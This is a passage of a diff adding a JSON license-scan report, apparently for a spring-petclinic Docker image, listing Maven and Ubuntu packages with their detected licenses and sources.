"sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "EPL-1.0", + "link": "http://www.eclipse.org/legal/epl-v10.html", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0-with-GCC-exception", + "link": "https://gcc.gnu.org/git/?p=gcc.git;a=blob;f=gcc/libgcc1.c;h=762f5143fc6eed57b6797c82710f3538aa52b40b;hb=cb143a3ce4fb417c68f5fa2691a1b1b1053dfba9#l10", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "net.bytebuddy:byte-buddy:1.14.6", + "component_name": "net.bytebuddy:byte-buddy", + "version": "1.14.6", + "pkg_type": "maven", + "package_id": "gav://net.bytebuddy:byte-buddy", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.antlr:antlr4-runtime:4.10.1", + "component_name": "org.antlr:antlr4-runtime", + "version": "4.10.1", + "pkg_type": "maven", + "package_id": "gav://org.antlr:antlr4-runtime", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.apache.logging.log4j:log4j-api:2.20.0", + "component_name": "org.apache.logging.log4j:log4j-api", + "version": "2.20.0", + "pkg_type": "maven", + "package_id": "gav://org.apache.logging.log4j:log4j-api", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.apache.logging.log4j:log4j-to-slf4j:2.20.0", + "component_name": "org.apache.logging.log4j:log4j-to-slf4j", + "version": "2.20.0", + "pkg_type": "maven", + "package_id": "gav://org.apache.logging.log4j:log4j-to-slf4j", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.apache.tomcat.embed:tomcat-embed-core:10.1.12", + "component_name": "org.apache.tomcat.embed:tomcat-embed-core", + "version": "10.1.12", + "pkg_type": "maven", + "package_id": "gav://org.apache.tomcat.embed:tomcat-embed-core", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "CDDL-1.0", + "link": "http://www.opensource.org/licenses/cddl1", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "CDDL-1.1", + "link": "http://glassfish.java.net/public/CDDL+GPL_1_1.html", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "EPL-2.0", + "link": "https://spdx.org/licenses/EPL-2.0", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.apache.tomcat.embed:tomcat-embed-el:10.1.12", + "component_name": "org.apache.tomcat.embed:tomcat-embed-el", + "version": "10.1.12", + "pkg_type": "maven", + "package_id": "gav://org.apache.tomcat.embed:tomcat-embed-el", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.apache.tomcat.embed:tomcat-embed-websocket:10.1.12", + "component_name": "org.apache.tomcat.embed:tomcat-embed-websocket", + "version": "10.1.12", + "pkg_type": "maven", + "package_id": "gav://org.apache.tomcat.embed:tomcat-embed-websocket", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.aspectj:aspectjweaver:1.9.20", + "component_name": "org.aspectj:aspectjweaver", + "version": "1.9.20", + "pkg_type": "maven", + "package_id": "gav://org.aspectj:aspectjweaver", + "licenses": [ + { + "key": "EPL-2.0", + "link": "https://spdx.org/licenses/EPL-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.attoparser:attoparser:2.0.7.RELEASE", + "component_name": "org.attoparser:attoparser", + "version": "2.0.7.RELEASE", + "pkg_type": "maven", + "package_id": "gav://org.attoparser:attoparser", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.eclipse.angus:angus-activation:2.0.1", + "component_name": "org.eclipse.angus:angus-activation", + "version": "2.0.1", + "pkg_type": "maven", + "package_id": "gav://org.eclipse.angus:angus-activation", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.glassfish.jaxb:jaxb-core:4.0.3", + "component_name": "org.glassfish.jaxb:jaxb-core", + "version": "4.0.3", + "pkg_type": "maven", + "package_id": "gav://org.glassfish.jaxb:jaxb-core", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "EPL-1.0", + "link": "http://www.eclipse.org/legal/epl-v10.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.glassfish.jaxb:jaxb-runtime:4.0.3", + "component_name": "org.glassfish.jaxb:jaxb-runtime", + "version": "4.0.3", + "pkg_type": "maven", + "package_id": "gav://org.glassfish.jaxb:jaxb-runtime", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "EPL-1.0", + "link": "http://www.eclipse.org/legal/epl-v10.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.glassfish.jaxb:txw2:4.0.3", + "component_name": "org.glassfish.jaxb:txw2", + "version": "4.0.3", + "pkg_type": "maven", + "package_id": "gav://org.glassfish.jaxb:txw2", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "EPL-1.0", + "link": "http://www.eclipse.org/legal/epl-v10.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.hdrhistogram:HdrHistogram:2.1.12", + "component_name": "org.hdrhistogram:HdrHistogram", + "version": "2.1.12", + "pkg_type": "maven", + "package_id": "gav://org.hdrhistogram:HdrHistogram", + "licenses": [ + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "CC0-1.0", + "link": "http://creativecommons.org/publicdomain/zero/1.0/", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.hibernate.common:hibernate-commons-annotations:6.0.6.Final", + "component_name": "org.hibernate.common:hibernate-commons-annotations", + "version": "6.0.6.Final", + "pkg_type": "maven", + "package_id": "gav://org.hibernate.common:hibernate-commons-annotations", + "licenses": [ + { + "key": "LGPL-2.1-only", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.hibernate.orm:hibernate-core:6.2.7.Final", + "component_name": "org.hibernate.orm:hibernate-core", + "version": "6.2.7.Final", + "pkg_type": "maven", + "package_id": "gav://org.hibernate.orm:hibernate-core", + "licenses": [ + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.hibernate.validator:hibernate-validator:8.0.1.Final", + "component_name": "org.hibernate.validator:hibernate-validator", + "version": "8.0.1.Final", + "pkg_type": "maven", + "package_id": "gav://org.hibernate.validator:hibernate-validator", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.jboss.logging:jboss-logging:3.5.3.Final", + "component_name": "org.jboss.logging:jboss-logging", + "version": "3.5.3.Final", + "pkg_type": "maven", + "package_id": "gav://org.jboss.logging:jboss-logging", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.latencyutils:LatencyUtils:2.0.3", + "component_name": "org.latencyutils:LatencyUtils", + "version": "2.0.3", + "pkg_type": "maven", + "package_id": "gav://org.latencyutils:LatencyUtils", + "licenses": [ + { + "key": "CC0-1.0", + "link": "http://creativecommons.org/publicdomain/zero/1.0/", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.slf4j:jul-to-slf4j:2.0.7", + "component_name": "org.slf4j:jul-to-slf4j", + "version": "2.0.7", + "pkg_type": "maven", + "package_id": "gav://org.slf4j:jul-to-slf4j", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.slf4j:slf4j-api:2.0.7", + "component_name": "org.slf4j:slf4j-api", + "version": "2.0.7", + "pkg_type": "maven", + "package_id": "gav://org.slf4j:slf4j-api", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework.boot:spring-boot:3.1.3", + "component_name": "org.springframework.boot:spring-boot", + "version": "3.1.3", + "pkg_type": "maven", + "package_id": "gav://org.springframework.boot:spring-boot", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework.boot:spring-boot-actuator:3.1.3", + "component_name": "org.springframework.boot:spring-boot-actuator", + "version": "3.1.3", + "pkg_type": "maven", + "package_id": "gav://org.springframework.boot:spring-boot-actuator", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework.boot:spring-boot-actuator-autoconfigure:3.1.3", + "component_name": "org.springframework.boot:spring-boot-actuator-autoconfigure", + "version": "3.1.3", + "pkg_type": "maven", + "package_id": "gav://org.springframework.boot:spring-boot-actuator-autoconfigure", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework.boot:spring-boot-autoconfigure:3.1.3", + "component_name": "org.springframework.boot:spring-boot-autoconfigure", + "version": "3.1.3", + "pkg_type": "maven", + "package_id": "gav://org.springframework.boot:spring-boot-autoconfigure", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework.boot:spring-boot-jarmode-layertools:3.1.3", + "component_name": "org.springframework.boot:spring-boot-jarmode-layertools", + "version": "3.1.3", + "pkg_type": "maven", + "package_id": "gav://org.springframework.boot:spring-boot-jarmode-layertools", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework.cloud:spring-cloud-bindings:1.13.0", + "component_name": "org.springframework.cloud:spring-cloud-bindings", + "version": "1.13.0", + "pkg_type": "maven", + "package_id": "gav://org.springframework.cloud:spring-cloud-bindings", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework.data:spring-data-commons:3.1.3", + "component_name": "org.springframework.data:spring-data-commons", + "version": "3.1.3", + "pkg_type": "maven", + "package_id": "gav://org.springframework.data:spring-data-commons", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework.data:spring-data-jpa:3.1.3", + "component_name": "org.springframework.data:spring-data-jpa", + "version": "3.1.3", + "pkg_type": "maven", + "package_id": "gav://org.springframework.data:spring-data-jpa", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework.samples:spring-petclinic:3.1.0-SNAPSHOT", + "component_name": "org.springframework.samples:spring-petclinic", + "version": "3.1.0-SNAPSHOT", + "pkg_type": "maven", + "package_id": "gav://org.springframework.samples:spring-petclinic", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-aop:6.0.11", + "component_name": "org.springframework:spring-aop", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-aop", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-aspects:6.0.11", + "component_name": "org.springframework:spring-aspects", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-aspects", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-beans:6.0.11", + "component_name": "org.springframework:spring-beans", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-beans", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-context:6.0.11", + "component_name": "org.springframework:spring-context", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-context", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-context-support:6.0.11", + "component_name": "org.springframework:spring-context-support", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-context-support", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-core:6.0.11", + "component_name": "org.springframework:spring-core", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-core", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-expression:6.0.11", + "component_name": "org.springframework:spring-expression", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-expression", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-jcl:6.0.11", + "component_name": "org.springframework:spring-jcl", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-jcl", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-jdbc:6.0.11", + "component_name": "org.springframework:spring-jdbc", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-jdbc", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-orm:6.0.11", + "component_name": "org.springframework:spring-orm", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-orm", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-tx:6.0.11", + "component_name": "org.springframework:spring-tx", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-tx", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-web:6.0.11", + "component_name": "org.springframework:spring-web", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-web", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.springframework:spring-webmvc:6.0.11", + "component_name": "org.springframework:spring-webmvc", + "version": "6.0.11", + "pkg_type": "maven", + "package_id": "gav://org.springframework:spring-webmvc", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.thymeleaf:thymeleaf:3.1.2.RELEASE", + "component_name": "org.thymeleaf:thymeleaf", + "version": "3.1.2.RELEASE", + "pkg_type": "maven", + "package_id": "gav://org.thymeleaf:thymeleaf", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.unbescape:unbescape:1.1.6.RELEASE", + "component_name": "org.unbescape:unbescape", + "version": "1.1.6.RELEASE", + "pkg_type": "maven", + "package_id": "gav://org.unbescape:unbescape", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.webjars.npm:bootstrap:5.2.3", + "component_name": "org.webjars.npm:bootstrap", + "version": "5.2.3", + "pkg_type": "maven", + "package_id": "gav://org.webjars.npm:bootstrap", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.webjars.npm:font-awesome:4.7.0", + "component_name": "org.webjars.npm:font-awesome", + "version": "4.7.0", + "pkg_type": "maven", + "package_id": "gav://org.webjars.npm:font-awesome", + "licenses": [ + { + "key": "Openfont-1.1", + "link": "http://scripts.sil.org/cms/scripts/page.php?item_id=OFL_web", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "org.yaml:snakeyaml:1.33", + "component_name": "org.yaml:snakeyaml", + "version": "1.33", + "pkg_type": "maven", + "package_id": "gav://org.yaml:snakeyaml", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "postgresql-42.6.0.jar", + "component_name": "postgresql-42.6.0.jar", + "version": "", + "pkg_type": "generic", + "package_id": "generic://sha256:b817c67a40c94249fd59d4e686e3327ed0d3d3fae426b20da0f1e75652cfc461/postgresql-42.6.0.jar", + "licenses": [ + { + "key": "BSD-2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 5 + } + ] + } + ] + }, + { + "component_id": "spring-petclinic:3.1.0-SNAPSHOT", + "component_name": "spring-petclinic", + "version": "3.1.0-SNAPSHOT", + "pkg_type": "docker", + "package_id": "docker://spring-petclinic", + "licenses": [ + { + "key": "Unknown", + "link": "", + "sources": [] + } + ] + }, + { + "component_id": "thymeleaf-spring6-3.1.2.RELEASE.jar", + "component_name": "thymeleaf-spring6-3.1.2.RELEASE.jar", + "version": "", + "pkg_type": "generic", + "package_id": "generic://sha256:2d2dd31d1252d3777b521db6b371de986efabd2d5b15d51c5cad78b79cd7799c/thymeleaf-spring6-3.1.2.RELEASE.jar", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:adduser:3.116ubuntu1", + "component_name": "ubuntu:bionic:adduser", + "version": "3.116ubuntu1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:adduser", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:apt:1.6.17", + "component_name": "ubuntu:bionic:apt", + "version": "1.6.17", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:apt", + "licenses": [ + { + "key": "GPL-2.0-only", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:base-files:10.1ubuntu2.11", + "component_name": "ubuntu:bionic:base-files", + "version": "10.1ubuntu2.11", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:base-files", + "licenses": [ + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:base-passwd:3.5.44", + "component_name": "ubuntu:bionic:base-passwd", + "version": "3.5.44", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:base-passwd", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:bash:4.4.18-2ubuntu1.3", + "component_name": "ubuntu:bionic:bash", + "version": "4.4.18-2ubuntu1.3", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:bash", + "licenses": [ + { + "key": "BSD-4-Clause-UC", + "link": "http://www.freebsd.org/copyright/license.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GFDL-1.3-no-invariants-or-later", + "link": "", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0-only", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:bsdutils:1:2.31.1-0.4ubuntu3.7", + "component_name": "ubuntu:bionic:bsdutils", + "version": "1:2.31.1-0.4ubuntu3.7", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:bsdutils", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": 